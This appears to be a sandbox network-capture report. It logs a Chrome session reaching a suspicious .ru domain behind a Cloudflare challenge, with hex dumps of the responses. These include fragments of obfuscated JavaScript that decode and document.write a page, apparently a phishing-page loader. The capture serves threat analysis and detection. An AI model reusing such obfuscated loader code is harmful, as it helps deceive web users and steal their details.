                                                                                                                                                                                    cf-chl-out-s: hqBFj8Iib3pt+dxv8qxEzsTOntz+Tr5816xOUmIfPXH2Sa26wXG20EIsh9JiGgraIVhLqqdE2Ow15INTezMaEvrtGJjwFTyD977xfgq/VhCO7Pvquj8S1V7Z0bwNERxHv2wHasw4q/XdNvg+mEWCZgKe4ljpvzmE7hgZbN+CPrMIIyhe2D78ZaLAF8SNV9K2rgZo4k9zCG8B26uvXsKvtG/PYzzrs+dT8tDV2jVKHFbjNiY65nKtt+c31Xuj0Z7gm0V7tr5G3dR5i2xhPK9Rt8J65ns9CBChMkCvh/KKCBvwCAJkiLLGmYieDpyrKpmglfHUp71H0KdP67xIe/ae3bwzYCQ6oHALKzynLvS2i0YPOpac0Zt5cMPJHxy0yEDadwtOgCjyoEKxj/6CH1HovV7+TmZStLXxg2BWjGF/aumVAOUwI5sq9T2Oo1844aqpLfVu+29ba6TJP4XHpC3+RcRTkvJQJ3mfK9O/t3DWQv9dwAE6ksoTQv3e7y4XFc5wlKXGyxU5WujRD0M8gsMo94GcGXcKdjRmTEK8rt3652YAuBkZSbdlbXzxFyibmEHaJzZAT78nVIBAn2DWykGP0bheGOpbM1PxqZzeUNgrAMd+eca4NO0HsgcZYUAyIcu+1rlUHx+YUKiycxjLAZ4/jba5XvcLfANQRsx3hDjJkIBRp0S2RCLXD0UFpg3OGfR9zSABrjCoUII1SKD0GUIK/G5fAcxk0SzWLyvYUKTIMTOJ+LTXKCAtU3h9i8mEtwaQoc8F3iM+3cBp54bh3UkmjxD0l2VvYqbdeo+db47BIVqwE4SD2+/K5XG8zlZ2oEci1Th0kXjcs2QLWfGyKQK5nap+kaXqFsGfqJRB3CwyXog=$mUSRtS7FRoHEAfL0gCR9Hg==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cec3a166767-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:47 UTC62INData Raw: 64 62 63 0d 0a 66 5a 61 64 69 49 32 4c 6b 35 79 58 74 72 47 7a 6d 35 4f 57 69 62 6d 45 6e 62 2f 47 6a 35 32 72 79 73 32 74 77 4e 43 71 78 6f 36 6d 31 63 66 4b 30 63 4f 63 72 64 58 48 31
                                                                                                                                                                                    Data Ascii: dbcfZadiI2Lk5yXtrGzm5OWibmEnb/Gj52rys2twNCqxo6m1cfK0cOcrdXH1
                                                                                                                                                                                    2024-01-26 13:41:47 UTC1369INData Raw: 74 4c 55 73 2b 50 44 6f 2b 7a 50 35 62 43 6f 75 2b 6d 30 72 50 43 78 79 72 44 6c 78 72 50 75 39 50 7a 75 7a 41 4c 35 31 41 4f 2b 38 4e 72 32 2b 4c 37 4b 36 38 67 4d 44 66 72 4e 35 78 54 70 30 4d 34 55 38 42 6e 6b 31 74 58 32 36 76 30 56 32 77 41 4f 47 77 6b 62 45 67 59 64 36 42 6f 76 4b 69 51 44 4d 67 67 73 43 41 41 69 47 75 38 63 4a 68 30 75 44 76 77 56 4c 54 6b 69 4f 44 41 37 42 41 49 30 47 7a 51 61 52 44 39 45 53 41 52 41 4c 78 41 65 52 44 63 59 4b 6c 6c 5a 46 52 34 33 53 6a 49 73 49 69 34 2f 51 44 77 39 4e 6c 52 6f 4e 6c 74 6b 5a 6c 78 6f 59 47 70 4e 63 46 5a 48 63 47 55 77 63 45 6c 34 62 58 4e 51 63 6a 39 57 50 6e 63 38 51 57 56 36 68 6c 70 59 65 33 35 74 58 6d 43 51 67 6e 4e 6f 55 32 4f 58 62 56 47 47 69 35 69 51 56 6e 39 37 66 48 57 41 6e 70 4a 68
                                                                                                                                                                                    Data Ascii: tLUs+PDo+zP5bCou+m0rPCxyrDlxrPu9PzuzAL51AO+8Nr2+L7K68gMDfrN5xTp0M4U8Bnk1tX26v0V2wAOGwkbEgYd6BovKiQDMggsCAAiGu8cJh0uDvwVLTkiODA7BAI0GzQaRD9ESARALxAeRDcYKllZFR43SjIsIi4/QDw9NlRoNltkZlxoYGpNcFZHcGUwcEl4bXNQcj9WPnc8QWV6hlpYe35tXmCQgnNoU2OXbVGGi5iQVn97fHWAnpJh
                                                                                                                                                                                    2024-01-26 13:41:47 UTC1369INData Raw: 66 65 79 63 2b 2b 7a 36 33 70 77 37 50 57 31 2f 76 49 31 74 62 78 34 4e 54 32 2b 51 50 31 34 66 6e 44 30 65 48 43 76 65 30 43 41 67 37 4e 42 65 33 30 38 51 6f 4a 42 73 72 34 44 4e 62 53 2b 68 4d 42 36 50 72 2b 38 79 58 39 38 78 4c 6a 43 68 38 59 46 51 38 4d 42 68 30 4a 4a 67 55 55 46 79 73 32 2b 43 30 75 39 43 55 53 43 6a 41 62 48 79 45 69 4a 43 59 34 41 53 67 70 4a 6a 59 46 51 67 67 74 50 7a 4e 45 55 79 4d 75 44 30 4e 44 54 6b 34 56 52 6a 39 51 55 7a 38 2f 50 79 77 6b 50 52 35 54 4f 31 38 69 5a 32 4e 46 53 31 41 6e 55 46 46 42 55 6c 42 49 5a 46 70 55 52 6d 52 6c 55 33 41 39 59 6c 6c 31 59 45 52 34 5a 58 68 32 66 57 79 48 67 59 4b 44 65 34 70 7a 63 58 2b 49 69 6f 75 41 63 6f 39 73 68 35 42 2f 6b 35 2b 55 6c 49 53 62 6d 59 39 34 6f 49 65 66 65 61 53 4f 6c
                                                                                                                                                                                    Data Ascii: feyc++z63pw7PW1/vI1tbx4NT2+QP14fnD0eHCve0CAg7NBe308QoJBsr4DNbS+hMB6Pr+8yX98xLjCh8YFQ8MBh0JJgUUFys2+C0u9CUSCjAbHyEiJCY4ASgpJjYFQggtPzNEUyMuD0NDTk4VRj9QUz8/PywkPR5TO18iZ2NFS1AnUFFBUlBIZFpURmRlU3A9Yll1YER4ZXh2fWyHgYKDe4pzcX+IiouAco9sh5B/k5+UlISbmY94oIefeaSOl
                                                                                                                                                                                    2024-01-26 13:41:47 UTC723INData Raw: 69 31 2b 50 56 35 65 2f 76 33 4f 32 36 30 65 7a 33 34 64 6e 39 39 64 50 37 32 66 63 41 79 77 34 43 36 77 51 4b 37 75 4c 2b 7a 67 7a 53 38 52 45 48 31 66 6b 4e 46 50 37 35 37 51 37 64 2b 41 4d 52 33 68 2f 6c 43 50 6e 72 44 69 44 6f 4c 50 30 71 37 75 55 43 4b 43 77 6a 2b 43 30 62 4c 2f 49 71 2b 6a 4d 64 4d 6a 73 69 4d 54 49 38 42 41 67 2b 47 67 68 49 4b 67 73 70 43 6a 34 6b 51 77 34 7a 54 30 78 4e 55 43 67 32 4f 44 74 55 56 46 56 5a 52 44 35 43 56 6a 5a 54 52 6c 38 6e 57 46 56 5a 51 45 5a 41 5a 53 35 6e 59 6c 52 66 53 6c 52 76 4e 6c 5a 48 63 33 4a 2f 61 6e 5a 69 66 32 56 78 51 33 64 79 65 57 6f 2b 65 6e 74 4a 54 58 43 4a 54 55 31 6c 68 46 46 74 57 59 32 51 65 6f 36 56 6b 70 79 58 6c 4a 5a 6b 57 35 68 6a 6b 4a 36 69 69 33 57 4d 70 48 79 72 72 4a 32 51 69 70
                                                                                                                                                                                    Data Ascii: i1+PV5e/v3O260ez34dn99dP72fcAyw4C6wQK7uL+zgzS8REH1fkNFP757Q7d+AMR3h/lCPnrDiDoLP0q7uUCKCwj+C0bL/Iq+jMdMjsiMTI8BAg+GghIKgspCj4kQw4zT0xNUCg2ODtUVFVZRD5CVjZTRl8nWFVZQEZAZS5nYlRfSlRvNlZHc3J/anZif2VxQ3dyeWo+entJTXCJTU1lhFFtWY2Qeo6VkpyXlJZkW5hjkJ6ii3WMpHyrrJ2Qip
                                                                                                                                                                                    2024-01-26 13:41:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    32192.168.2.1649766104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:48 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/665851253:1706274618:ee7eBQ0fH6Ey9MEbinbSg9TNLutSYhmnKDUTs70R0JE/84b92c841f99b127/bd4b5c1cf495e39 HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:48 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:48 GMT
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    cf-chl-out: qaR4sirn99hGS9s+EOoi1w==$7VSR/gMwS/Zd9+LXEdhEBg==
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cf099d153cc-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:48 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                                                                                    Data Ascii: 7invalid
                                                                                                                                                                                    2024-01-26 13:41:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    33192.168.2.1649765104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:48 UTC787OUTPOST /0dYBKHbNSXk HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 712
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaRkcv3dF7BpmmPs5
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Origin: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:48 UTC712OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 61 52 6b 63 76 33 64 46 37 42 70 6d 6d 50 73 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 51 5a 57 43 71 31 59 33 38 54 38 76 50 4e 35 4f 6c 52 53 6f 52 56 51 71 42 79 4c 45 46 54 4c 5f 42 41 67 41 61 42 76 2d 61 45 77 75 66 2d 32 62 6e 61 33 4f 52 5f 68 73 76 64 76 77 33 45 44 34 5a 59 54 37 36 46 56 61 30 33 43 78 68 2d 65 66 62 70 70 34 76 66 44 51 77 73 2d 46 4f 57 6e 63 4b 6c 59 69 4c 67 50 67 64 77 4c 6e 79 4a 68 51 57 34 67 45 52 41 74 55 53 4c 72 43 6a 30 47 62 33 4a 39 41 4d 4d 55 6a 5f 62 55 66 6c 51 6f 36 6a 43 54
                                                                                                                                                                                    Data Ascii: ------WebKitFormBoundaryaRkcv3dF7BpmmPs5Content-Disposition: form-data; name="cf-turnstile-response"0.QZWCq1Y38T8vPN5OlRSoRVQqByLEFTL_BAgAaBv-aEwuf-2bna3OR_hsvdvw3ED4ZYT76FVa03Cxh-efbpp4vfDQws-FOWncKlYiLgPgdwLnyJhQW4gERAtUSLrCj0Gb3J9AMMUj_bUflQo6jCT
                                                                                                                                                                                    2024-01-26 13:41:49 UTC751INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:48 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WDnUVKhNSR%2FqvgBD3RgYP8B15HN6dQztYufrE%2F0eovsgF5Bq0pMW6g8nLOdYU2FvQsQOwFhkXk6i0g8O0CBZeDibtLUq2tzJXv8%2FTn46BOXF7ZmK80nI%2FhXokijYCw7sEZpE%2FITNPUTGgsbgO47wMKSbEOw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cef99ee6736-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    34192.168.2.1649768104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:49 UTC860OUTGET /hIdlMLOfWxySOTr9FfmxCijqf/ HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:50 UTC738INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:50 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NT4IESajyZVw%2FoGJ0yMPGZkJIdyjT1GgdfX2irJiJuNZi49KG3uuwuqHlv1RAgYOTnuqIOg6ZZaFbBqOwxRpmnU%2FpESEdd9TIdg0KbG5sVB2DFYqdUYuJ0FVunoVtJW%2FNVrkPsrn5eWMBtuLhaIgesrYYFY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cf89a17137d-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:50 UTC631INData Raw: 32 64 61 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 4d 6d 52 41 49 56 47 5a 52 6c 72 78 4f 20 3d 20 27 53 55 69 62 52 6f 72 65 74 59 27 3b 0d 0a 76 61 72 20 6a 55 44 77 6f 70 57 41 58 52 6a 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 32 29 3b 0d 0a 76 61 72 20 6f 63 62 69 49 44 55 77 20 3d 20 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0d 0a 76 61 72 20 4d 6d 52 41 49 56 47 5a 52 6c 72 78 4f 20 3d 20 27 79 53 52 6b 57 79 50 73 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 4c 64 62 62 4b 79 51 70 70 28 75 42 72 6d 41 63 57 47 52 55 67 6e 2c 20 45 78 63 51 6f 4c 50 4b 63 76 69 41 76 49 73 29 20 7b 0d 0a 09 6c 65 74 20 51 6d 69 61 75 75 6f 6f 6e 69 48 69 20 3d 20 27
                                                                                                                                                                                    Data Ascii: 2da<script>var MmRAIVGZRlrxO = 'SUibRoretY';var jUDwopWAXRj = window.location.hash.substr(2);var ocbiIDUw = new URL(window.location.href);var MmRAIVGZRlrxO = 'ySRkWyPs';function LdbbKyQpp(uBrmAcWGRUgn, ExcQoLPKcviAvIs) {let QmiauuooniHi = '
                                                                                                                                                                                    2024-01-26 13:41:50 UTC106INData Raw: 4b 7a 4d 44 4c 41 59 7a 41 69 55 38 4d 79 77 6f 47 7a 4d 37 4e 6d 35 75 53 6e 39 72 49 7a 73 44 4d 7a 59 6b 57 41 3d 3d 60 2c 20 60 58 71 5a 46 50 66 4f 66 41 49 74 43 44 50 60 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 79 75 71 47 4f 61 53 50 71 6b 64 4e 6d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                    Data Ascii: KzMDLAYzAiU8MywoGzM7Nm5uSn9rIzsDMzYkWA==`, `XqZFPfOfAItCDP`);document.write(yuqGOaSPqkdNm);</script>
                                                                                                                                                                                    2024-01-26 13:41:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    35192.168.2.1649769104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:50 UTC650OUTGET /1NvPLxRoMcdUBerpFudBvnKUtP/ HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:50 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:50 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1PIOlmdzo9MgYEP%2FixYJBPsfVkpSiZxmAKP9880P1L%2BkQYvumAo1hXqyzfBIFGf8s3AiY9YOzWGtBETsJ4DrKohn%2FUHKT5eavE69m2d3D8WEKnLDwylRvDQnK7ciRMTHATtkbY4Lw%2BZThVA4Ff%2F5KWCtOxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cfdbc267b9f-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:50 UTC629INData Raw: 34 39 65 39 0d 0a 76 61 72 20 70 4d 72 56 69 79 73 56 78 72 78 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 30 5d 20 3d 20 36 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 5d 20 3d 20 33 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 5d 20 3d 20 31 30 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 5d 20 3d 20 31 31 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 34 5d 20 3d 20 39 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 35 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 36 5d 20 3d 20 31 32 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 37 5d 20 3d 20 31 31 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 38 5d 20 3d 20 31 30 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 5d 20 3d 20 33 32 3b 0a 70 4d 72 56
                                                                                                                                                                                    Data Ascii: 49e9var pMrViysVxrx = new Array;pMrViysVxrx[0] = 60;pMrViysVxrx[1] = 33;pMrViysVxrx[2] = 100;pMrViysVxrx[3] = 111;pMrViysVxrx[4] = 99;pMrViysVxrx[5] = 116;pMrViysVxrx[6] = 121;pMrViysVxrx[7] = 112;pMrViysVxrx[8] = 101;pMrViysVxrx[9] = 32;pMrV
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 3d 20 31 30 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 37 5d 20 3d 20 36 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 38 5d 20 3d 20 33 34 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 32 39 5d 20 3d 20 31 30 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 30 5d 20 3d 20 31 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 31 5d 20 3d 20 33 34 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 32 5d 20 3d 20 36 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 33 5d 20 3d 20 31 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 34 5d 20 3d 20 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 35 5d 20 3d 20 36 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 36 5d 20 3d 20 31 30 34 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 33 37 5d 20 3d 20 31 30 31 3b 0a 70 4d
                                                                                                                                                                                    Data Ascii: = 103;pMrViysVxrx[27] = 61;pMrViysVxrx[28] = 34;pMrViysVxrx[29] = 101;pMrViysVxrx[30] = 110;pMrViysVxrx[31] = 34;pMrViysVxrx[32] = 62;pMrViysVxrx[33] = 13;pMrViysVxrx[34] = 10;pMrViysVxrx[35] = 60;pMrViysVxrx[36] = 104;pMrViysVxrx[37] = 101;pM
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 20 3d 20 31 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 38 38 5d 20 3d 20 39 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 38 39 5d 20 3d 20 31 31 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 30 5d 20 3d 20 31 30 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 31 5d 20 3d 20 31 31 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 32 5d 20 3d 20 31 31 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 33 5d 20 3d 20 33 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 34 5d 20 3d 20 31 31 37 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 35 5d 20 3d 20 31 32 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 36 5d 20 3d 20 37 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 37 5d 20 3d 20 31 30 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 39 38 5d 20 3d 20 38 39
                                                                                                                                                                                    Data Ascii: = 110;pMrViysVxrx[88] = 99;pMrViysVxrx[89] = 116;pMrViysVxrx[90] = 105;pMrViysVxrx[91] = 111;pMrViysVxrx[92] = 110;pMrViysVxrx[93] = 32;pMrViysVxrx[94] = 117;pMrViysVxrx[95] = 121;pMrViysVxrx[96] = 75;pMrViysVxrx[97] = 103;pMrViysVxrx[98] = 89
                                                                                                                                                                                    2024-01-26 13:41:50 UTC1369INData Raw: 3d 20 34 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 34 37 5d 20 3d 20 36 34 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 34 38 5d 20 3d 20 34 30 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 34 39 5d 20 3d 20 39 31 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 30 5d 20 3d 20 39 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 31 5d 20 3d 20 31 31 39 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 32 5d 20 3d 20 34 35 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 33 5d 20 3d 20 39 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 34 5d 20 3d 20 34 33 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 35 5d 20 3d 20 39 32 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 36 5d 20 3d 20 34 36 3b 0a 70 4d 72 56 69 79 73 56 78 72 78 5b 31 35 37 5d 20 3d
                                                                                                                                                                                    Data Ascii: = 42;pMrViysVxrx[147] = 64;pMrViysVxrx[148] = 40;pMrViysVxrx[149] = 91;pMrViysVxrx[150] = 92;pMrViysVxrx[151] = 119;pMrViysVxrx[152] = 45;pMrViysVxrx[153] = 93;pMrViysVxrx[154] = 43;pMrViysVxrx[155] = 92;pMrViysVxrx[156] = 46;pMrViysVxrx[157] =
